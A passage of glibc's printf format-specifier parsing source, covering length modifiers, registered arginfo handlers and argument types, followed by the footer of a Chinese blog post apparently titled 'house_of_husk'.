		      *max_ref_arg = MAX (*max_ref_arg, n);
		    }
		  ++format;
		}
	    }
	  if (spec->prec_arg < 0)
	    {
	      /* Not in a positional parameter.  */
	      spec->prec_arg = posn++;
	      ++nargs;
	      format = begin;
	    }
	}
      else if (ISDIGIT (*format))
	{
	  int n = read_int (&format);
	  if (n != -1)
	    spec->info.prec = n;
	}
      else
	/* "%.?" is treated like "%.0?".  */
	spec->info.prec = 0;
    }
  /* Check for type modifiers.  */
  spec->info.is_long_double = 0;
  spec->info.is_short = 0;
  spec->info.is_long = 0;
  spec->info.is_char = 0;
  spec->info.user = 0;
  if (__builtin_expect (__printf_modifier_table == NULL, 1)
      || __printf_modifier_table[*format] == NULL
      || HANDLE_REGISTERED_MODIFIER (&format, &spec->info) != 0)
    switch (*format++)
      {
      case L_('h'):
	/* ints are short ints or chars.  */
	if (*format != L_('h'))
	  spec->info.is_short = 1;
	else
	  {
	    ++format;
	    spec->info.is_char = 1;
	  }
	break;
      case L_('l'):
	/* ints are long ints.  */
	spec->info.is_long = 1;
	if (*format != L_('l'))
	  break;
	++format;
	/* FALLTHROUGH */
      case L_('L'):
	/* doubles are long doubles, and ints are long long ints.  */
      case L_('q'):
	/* 4.4 uses this for long long.  */
	spec->info.is_long_double = 1;
	break;
      case L_('z'):
      case L_('Z'):
	/* ints are size_ts.  */
	assert (sizeof (size_t) <= sizeof (unsigned long long int));
#if LONG_MAX != LONG_LONG_MAX
	spec->info.is_long_double = (sizeof (size_t)
				     > sizeof (unsigned long int));
#endif
	spec->info.is_long = sizeof (size_t) > sizeof (unsigned int);
	break;
      case L_('t'):
	assert (sizeof (ptrdiff_t) <= sizeof (long long int));
#if LONG_MAX != LONG_LONG_MAX
	spec->info.is_long_double = (sizeof (ptrdiff_t) > sizeof (long int));
#endif
	spec->info.is_long = sizeof (ptrdiff_t) > sizeof (int);
	break;
      case L_('j'):
	assert (sizeof (uintmax_t) <= sizeof (unsigned long long int));
#if LONG_MAX != LONG_LONG_MAX
	spec->info.is_long_double = (sizeof (uintmax_t)
				     > sizeof (unsigned long int));
#endif
	spec->info.is_long = sizeof (uintmax_t) > sizeof (unsigned int);
	break;
      default:
	/* Not a recognized modifier.  Backup.  */
	--format;
	break;
      }
  /* Get the format specification.  */
  spec->info.spec = (wchar_t) *format++;
  spec->size = -1;
  if (__builtin_expect (__printf_function_table == NULL, 1)
      || spec->info.spec > UCHAR_MAX
      || __printf_arginfo_table[spec->info.spec] == NULL
      /* We don't try to get the types for all arguments if the format
	 uses more than one.  The normal case is covered though.  If
	 the call returns -1 we continue with the normal specifiers.  */
      || (int) (spec->ndata_args = (*__printf_arginfo_table[spec->info.spec])
				   (&spec->info, 1, &spec->data_arg_type,
				    &spec->size)) < 0)
    {
      /* Find the data argument types of a built-in spec.  */
      spec->ndata_args = 1;
      switch (spec->info.spec)
	{
	case L'i':
	case L'd':
	case L'u':
	case L'o':
	case L'X':
	case L'x':
	case L'B':
	case L'b':
#if LONG_MAX != LONG_LONG_MAX
	  if (spec->info.is_long_double)
	    spec->data_arg_type = PA_INT|PA_FLAG_LONG_LONG;
	  else
#endif
	    if (spec->info.is_long)
	      spec->data_arg_type = PA_INT|PA_FLAG_LONG;
	    else if (spec->info.is_short)
	      spec->data_arg_type = PA_INT|PA_FLAG_SHORT;
	    else if (spec->info.is_char)
	      spec->data_arg_type = PA_CHAR;
	    else
	      spec->data_arg_type = PA_INT;
	  break;
	case L'e':
	case L'E':
	case L'f':
	case L'F':
	case L'g':
	case L'G':
	case L'a':
	case L'A':
	  if (spec->info.is_long_double)
	    spec->data_arg_type = PA_DOUBLE|PA_FLAG_LONG_DOUBLE;
	  else
	    spec->data_arg_type = PA_DOUBLE;
	  break;
	case L'c':
	  spec->data_arg_type = PA_CHAR;
	  break;
	case L'C':
	  spec->data_arg_type = PA_WCHAR;
	  break;
	case L's':
	  spec->data_arg_type = PA_STRING;
	  break;
	case L'S':
	  spec->data_arg_type = PA_WSTRING;
	  break;
	case L'p':
	  spec->data_arg_type = PA_POINTER;
	  break;
	case L'n':
	  spec->data_arg_type = PA_INT|PA_FLAG_PTR;
	  break;
	case L'm':
	default:
	  /* An unknown spec will consume no args.  */
	  spec->ndata_args = 0;
	  break;
	}
    }
  if (spec->data_arg == -1 && spec->ndata_args > 0)
    {
      /* There are args consumed, but no positional spec.  Use the
	 next sequential arg position.  */
      spec->data_arg = posn;
      nargs += spec->ndata_args;
    }
  if (spec->info.spec == L'\0')
    /* Format ended before this spec was complete.  */
    spec->end_of_fmt = spec->next_fmt = format - 1;
  else
    {
      /* Find the next format spec.  */
      spec->end_of_fmt = format;
#ifdef COMPILE_WPRINTF
      spec->next_fmt = __find_specwc (format);
#else
      spec->next_fmt = __find_specmb (format);
#endif
    }
  return nargs;
}

文章作者: q1ming
文章链接: http://example.com/2025/03/21/house_of_husk/
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 q1ming !
Heap
  目录